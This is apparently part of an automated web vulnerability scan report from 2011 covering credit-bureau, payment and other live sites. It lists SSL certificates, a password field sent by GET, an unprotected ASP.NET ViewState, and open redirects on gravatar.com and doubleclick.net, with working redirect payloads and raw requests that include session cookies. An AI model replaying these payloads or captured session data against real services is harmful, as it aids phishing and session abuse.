Valid from:  Tue Apr 27 19:00:00 CDT 2010
Valid to:  Sat May 07 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure OFX CA - G3
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 31 19:00:00 CDT 2009
Valid to:  Sun Mar 31 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

13.13. https://protect724.arcsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://protect724.arcsight.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  protect724.arcsight.com
Issued by:  Thawte Server CA
Valid from:  Tue Aug 11 19:00:00 CDT 2009
Valid to:  Fri Aug 12 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte Server CA
Issued by:  Thawte Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

13.14. https://psr.infusionsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://psr.infusionsoft.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.infusionsoft.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Jun 12 15:05:52 CDT 2010
Valid to:  Mon Aug 13 19:23:24 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

13.15. https://secure.lifelock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.lifelock.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Jul 11 19:00:00 CDT 2010
Valid to:  Wed Jul 25 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.16. https://www.credit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.credit.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.credit.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Apr 20 19:00:00 CDT 2010
Valid to:  Fri May 06 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.17. https://www.creditreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.creditreport.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Sun Nov 07 18:00:00 CST 2010
Valid to:  Tue Nov 08 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.18. https://www.econsumer.equifax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.econsumer.equifax.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.econsumer.equifax.com
Issued by:  Thawte SSL CA
Valid from:  Mon Oct 25 19:00:00 CDT 2010
Valid to:  Sun Oct 30 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

13.19. https://www.equifax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.equifax.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.equifax.com
Issued by:  Thawte SSL CA
Valid from:  Mon Oct 25 19:00:00 CDT 2010
Valid to:  Fri Oct 28 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

13.20. https://www.experiandirect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.experiandirect.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jun 20 19:00:00 CDT 2010
Valid to:  Tue Jun 21 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.21. https://www.freecreditscore.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freecreditscore.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.freecreditscore.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Mon Sep 27 19:00:00 CDT 2010
Valid to:  Wed Sep 28 18:59:59 CDT 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.22. https://www.hotelclub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelclub.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.hotelclub.com
Issued by:  USERTrust Legacy Secure Server CA
Valid from:  Sun Dec 19 18:00:00 CST 2010
Valid to:  Wed Oct 19 18:59:59 CDT 2011

Certificate chain #1

Issued to:  USERTrust Legacy Secure Server CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Nov 26 14:33:13 CST 2009
Valid to:  Sat Oct 31 23:00:00 CDT 2015

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

13.23. https://www.identityguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.identityguard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  WWW.IDENTITYGUARD.COM
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Sep 15 19:00:00 CDT 2009
Valid to:  Mon Sep 19 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.24. https://www.my3bureaucreditreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.my3bureaucreditreport.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.my3bureaucreditreport.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Thu Mar 03 18:00:00 CST 2011
Valid to:  Tue Mar 13 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.25. https://www.myfico.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.myfico.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.myfico.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Jan 03 18:00:00 CST 2010
Valid to:  Wed Jan 04 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.26. https://www.paypal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.paypal.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Mar 22 19:00:00 CDT 2011
Valid to:  Mon Apr 01 18:59:59 CDT 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.27. https://www.pcisecuritystandards.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pcisecuritystandards.org
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 22 19:00:00 CDT 2009
Valid to:  Sun Oct 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

13.28. https://www.privacyguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.privacyguard.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Dec 15 18:00:00 CST 2009
Valid to:  Mon Jan 16 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

13.29. https://www.securepaynet.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.securepaynet.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.securepaynet.net
Issued by:  Starfield Secure Certification Authority
Valid from:  Tue Mar 08 18:08:51 CST 2011
Valid to:  Wed Apr 03 18:58:51 CDT 2013

Certificate chain #1

Issued to:  Starfield Secure Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Wed Nov 15 19:15:40 CST 2006
Valid to:  Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:  Starfield Class 2 Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Tue Jun 29 12:39:16 CDT 2004
Valid to:  Thu Jun 29 12:39:16 CDT 2034

13.30. https://www.truecredit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.truecredit.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Sep 29 19:00:00 CDT 2010
Valid to:  Sat Sep 29 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

13.31. https://www.trustedid.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.trustedid.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.trustedid.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Jan 17 18:00:00 CST 2010
Valid to:  Fri Feb 24 17:59:59 CST 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

14. Password field submitted using GET method  previous  next
There are 2 instances of this issue:


14.1. https://online.americanexpress.com/myca/ocareg/us/action  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/ocareg/us/action

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=81294%20a%3dbc58b4f6d9f9&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=957221386.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:53:56 GMT
Server: IBM_HTTP_Server
Set-Cookie: JSESSIONID=0000j5aKXIpvhYDsmuOaqAi_4qD:14ia6c7a4; Path=/
Set-Cookie: MATFSI=IPCFSI::true~BBV::~; Path=/; Domain=.americanexpress.com; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Set-Cookie: NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b;Version=1;path=/
Keep-Alive: timeout=15, max=88
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=655231498.58660.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
</div>
<form name="plasticStep1Form" id="plasticStep1Form">
                <fieldset class="fieldSetStyle">
...[SNIP]...
</label>
<input id="input_cidNumber" type="password" name="CID" size="4" maxlength="4" onfocus="showCID(event);" title="Enter the 4-Digit Card Number printed above the account number on your Card here" alt = "Enter the 4-Digit Card Number printed above the account number on your Card here" onKeyUp="isDigits(event);tabNext4Up('input_accPart');" autocomplete="off" onblur="javascript:offHelperLayer();" />
</span>
...[SNIP]...

14.2. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

POST /pcworldconnect/comment_registration?callingurl=http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; JSESSIONID=00497792CB5578F6F5DDC4DEE6210001; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6225


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

15. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.my3bureaucreditreport.com
Path:   /19331/

Request

GET /19331/ HTTP/1.1
Host: www.my3bureaucreditreport.com
Connection: keep-alive
Referer: http://www.my3bureaucreditreport.com/?sid=12750&ad=12759
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=4ch5l4athaug1yqe2ymeuk45; __utmz=175466430.1303691698.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=175466430.268555149.1303691698.1303691698.1303691698.1; __utmc=175466430; __utmb=175466430.1.10.1303691698

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:27:14 GMT
Content-Length: 12361


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTYwMzk0Mzc4D2QWAgICD2QWBAIBD2QWAgIFD2QWBGYPZBYGAgEPFgIeBFRleHQFATFkAgMPDxYCHgdWaXNpYmxlZ2RkAgUPDxYCHwFoZBYIZg8QZGQWAWZkAgoPEGRkFgFmZAIMDxBkZBYBZmQCDQ8QZGQWAWZkAgEPFgIfAWhkAgMPZBYEAgMPFgIfAWhkAgUPFgIfAWdkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQZPcHRPdXQFBkltYWdlMQ==" />
...[SNIP]...

16. Open redirection  previous  next
There are 10 instances of this issue:


16.1. http://0.gravatar.com/avatar/c15ade3c9f2e1a2ac0337526017d8aa2 [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/c15ade3c9f2e1a2ac0337526017d8aa2

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a88f6a463132bf796/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d48 was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/c15ade3c9f2e1a2ac0337526017d8aa2?s=48&d=http%3a//a88f6a463132bf796/a%3fhttp%3a//0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536%3fs%3d48&r=G HTTP/1.1
Host: 0.gravatar.com
Proxy-Connection: keep-alive
Referer: http://visitmix.com/writings/how-crud-is-your-design
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 17:09:26 GMT
Expires: Sun, 24 Apr 2011 17:14:26 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a88f6a463132bf796/a?http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=48
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2388239973
Content-Length: 0


16.2. http://ad.doubleclick.net/clk [sv3 parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The value of the sv3 request parameter is used to perform an HTTP redirect. The payload http%3a//a2caa6b055535825b/a%3f295510%3b%3fhttp%3a//equifax.com/free30daytrial/%3fCMP%3dKNC-Google was submitted in the sv3 parameter. This caused a redirection to the following URL:

Request

GET /clk;225724241;49552626;h;u=ds&sv1=120467130&sv2=2011042473&sv3=http%3a//a2caa6b055535825b/a%3f295510%3b%3fhttp%3a//equifax.com/free30daytrial/%3fCMP%3dKNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
